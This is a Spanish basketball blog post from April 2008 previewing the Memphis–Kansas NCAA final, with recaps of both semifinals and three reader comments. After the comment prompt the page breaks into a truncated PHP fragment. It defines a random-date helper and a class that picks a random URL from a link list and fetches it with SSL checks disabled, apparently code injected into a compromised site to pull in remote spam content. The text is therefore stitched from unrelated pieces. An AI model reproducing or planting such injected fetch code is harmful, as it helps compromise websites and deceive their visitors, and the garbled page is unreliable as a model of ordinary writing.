Memphis y Kansas jugarán la final de la NCAA

06 de April de 2008 por Dantley

En la madrugada del lunes al martes se celebrará la final del NCAA 2008. Memphis es favorito sobre Kansas. Su solidez ante UCLA parece un aval más seguro. Repasemos los dos partidos de las semifinales en las que hubo más decepciones que grandes actuaciones. La gran final, la madrugada del lunes al martes a las 3:00. Memphis y kansas university buscarán en San Antonio la gloria universitaria.

Memphis 78 UCLA 63

UCLA se quedó sin respuestas. La NCAA suele provocar errores de apreciación en cuanto al potencial de los equipos. UCLA había demostrado ser un gran equipo con respuestas para distintas situaciones de partido. Love dominaba en la pintura, pero si el rival respondía con kilos, Collison abría el campo con su tiro exterior y Westbrook apoyaba con sus explosivas penetraciones.

Pero todo lo que se había planteado contra otros equipos no sirve cuando enfrente tienes a Memphis. Por dentro, Joey Dorsey destrozó a Love. Dorsey, el aspirante a ser Ben Wallace, se quedó a cero puntos, pero eso da igual. Lo suyo son otras cosas, la defensa física, el rebote, los tapones. Cierto es que no estuvo solo –buen trabajo del secundario Taggart. Kevin Love sufrió una defensa que se le cerraba impidiéndole que le llegaran balones o simplemente le forzaba a malos tiros y pérdidas.

Ante dicha situación lo habitual en UCLA es que aparezcan Collison y Westbrook. De Collison no hubo noticia alguna durante toda la noche, ni en ataque ni en defensa. Westbrook cumplió con 22 puntos pero curiosamente cada canasta suya en penetración era un paso atrás para UCLA dándole argumentos a Memphis para cerrarse más cerca de la zona.

Ante esta situación y tras la ventaja inicial de 5 puntos de UCLA, Memphis se dedicó a correr tras cada rebote defensivo. Y cuando no podía correr la receta se llamó Douglas-Roberts, un jugador antiestético en su forma de correr, en su forma de tirar, en su forma de botar, cuya producción parece estar por encima de su talento. Lo que no se puede negar es que CDR es un jugador inteligente, especialista en aprovechar cualquier mínima ventaja en los emparejamientos. Cerró la noche con 28 puntos,

Mientras, Derrick Rose dejó destellos. 25 puntos, 9 rebotes y 4 asistencias sin hacer un gran partido son números de gran jugador, aunque si por algo destacó ayer Rose es por la capacidad de saber estar en un segundo plano cuando el juego lo requería y por aplicarse en defensa.

Memphis pasa a ser el favorito, seguiremos hablando de ellos. UCLA, por su parte, se despide de manera triste, no ya por el mal partido sino por no haber intentado nada para cambiar el signo del encuentro, lo que no dice mucho de su entrenador Howland que sabe como masacrar a los rivales inferiores pero que ante los grandes no ha encontrado fórmulas para plantar cara.

Kansas 84 North Carolina 66

Kansas sacó fruto de la locura. Si el partido entre Memphis y UCLA fue uno de esos partidos en los que el equipo ganador va poco a poco minando la moral del perdedor, la segunda semifinal fue completamente distinta. Los que aguantaran hasta altas horas de la madrugada española asistieron a unos primeros 15 minutos antológicos de Kansas. A falta de 6:50 para terminar la primera parte Kansas pasaba por encima de North Carolina con un escalofriante 40-12. Eso en boxeo se llama K.O.

El banquillo de la Kansas University es probablemente el más profundo de la NCAA y ayer volvió a demostrarse. Así, en los primeros 5 minutos de partido ya se veía que Kansas intentaba llevar el partido al ritmo que les convenía. El 15-10 que reflejaba el marcador no era sino el preludio de la tormenta. Hasta ese momento Hansbrough mantenía a North Carolina en el partido, pero no era más que un espejismo. En 10 minutos que pasarán a la historia de esta universidad, Kansas endosó un 25-2 de parcial a North Carolina. Chalmers, Jackson, Collins, todos participaban de este festival en el que el rey fue el escolta Brandon Rush, el héroe casi local –natural de Kansas City, pero en el vecino estado de Missouri.

Con 40-12 parecía darse por concluido el partido. Pero nada más lejos de la realidad. Fue el momento en el que North Carolina sacó el coraje que les había faltado y con un juego poco elaborado para lo que se espera de un equipo cuyo base es Ty Lawson, empezó a recortar distancias. Su sexto hombre –falso sexto diríamos- Green colocó la diferencia al descanso en tan solo 15 puntos. Kansas había empezado a celebrar el triunfo demasiado pronto.

El descanso no pareció despertar a Kansas de su letargo. La defensa de ayudas sobre Tyler Hansbrough funcionaba, pero Green y Ellington encontraban buenas posiciones de tiro. A falta de 11 minutos la diferencia se quedaba en 4 puntos.

Tras el intercambio de golpes, quedaba lo que parecía que podía ser una resolución igualada pero fue entonces cuando el banquillo de Kansas hizo valer su solvencia. Collins, Aldrich y hasta el tosco Kaun aportaron puntos decisivos. Un final pobre para un partido caótico pero con fases de buen baloncesto.

Comenta

3 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Pues yo vi el primero en directo y el 2º hace 10 minutos que lo grabé.

    No veo a Douglas como Jose, a mi me pareció bastante estético, me gustó muchísimo. Rose ha dicho que no se ve preparado para la NBA y que está muy a gusto en Memphis, pero será lo típico que se dice antes de que acabe el curso.

    Yo también veo favorito a Memphis, aunque si Arthur le saca faltas rápidas a Dorsey puede ganar Kansas por ahí. Un equipo muy largo de Kansas contra las individualidades y el físico de Memphis, ambos han demostrado que son cabaces de defender muy bien, va a ser un peazo de final.

    De los eliminados, Collison mató a UCLA, no hizo nada bien, mientras Westbrook hizo lo que se le suponía y Love estaba desesperado por pillar algun balón, otro que deberia quedarse otro año en la universidad. Por NC me encantó Bullock, digo Ellington, menuda clase. Tyler es lo mas parecido a Madsen que he visto, jojo, juega muy feo y sabe hacer ciertas cosas pero si que parece que se quedará en una leyenda universitaria.

      Citar

  2. txusma dice:
    #2

    Que jugador de los que ayer saltaron sobre la pista no le vendría bien otro año en la universidad? Hasta a Beasley y Rose, claros num1 y num 2, les vendria bien estar otro año aprendiendo y puliendo aspectos de su juego.

      Citar

  3. Viva_Dirk dice:
    #3

    Pues hay pocos, pero algunos hay. Dorsey, Douglas-Roberts o Westbrook creo que están preparados, lo que van a hacer en la NBA ya saben hacerlo, ahora les toca coger experiencia en la liga y la habitual mejora física que tienen todos después de un año o dos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>